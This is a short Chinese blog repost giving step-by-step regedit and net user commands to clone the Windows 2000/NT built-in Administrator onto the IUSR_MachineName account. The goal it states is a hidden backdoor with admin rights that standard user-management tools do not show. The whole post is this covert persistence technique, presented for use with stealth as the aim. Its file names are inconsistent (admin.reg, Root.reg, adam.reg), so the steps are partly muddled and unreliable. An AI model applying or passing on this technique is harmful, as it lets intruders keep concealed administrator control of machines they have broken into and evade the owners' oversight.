登陆
浏览模式: 标准 | 列表 Tag: 克隆帐号

Clone Administrators

【转自Alphard:http://www.plmy.com

Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName (为了加强隐蔽性).
在cmd下输入命令:
regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
将SID为500的管理员帐号的相关信息导出,然后编辑admin.reg文件,将admin.reg文件的第三行.

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行然后另外一个是你需要修改那个账号的值.

regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
将iusr.reg文件中"'V'=hex:0"开始一直到iusr.reg文件结束部分复制下来,然后替换掉adam.reg中同样位置的部分.
最后使用 regedit /s adam.reg 导入该Reg文件,然后运行 net user IUSR_MachineName password 修改IUSR_MachineName的密码.ok,大功告成!

PS:现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户,都和修改前没有任何区别.

Tags: 克隆, 管理员帐号, 克隆帐号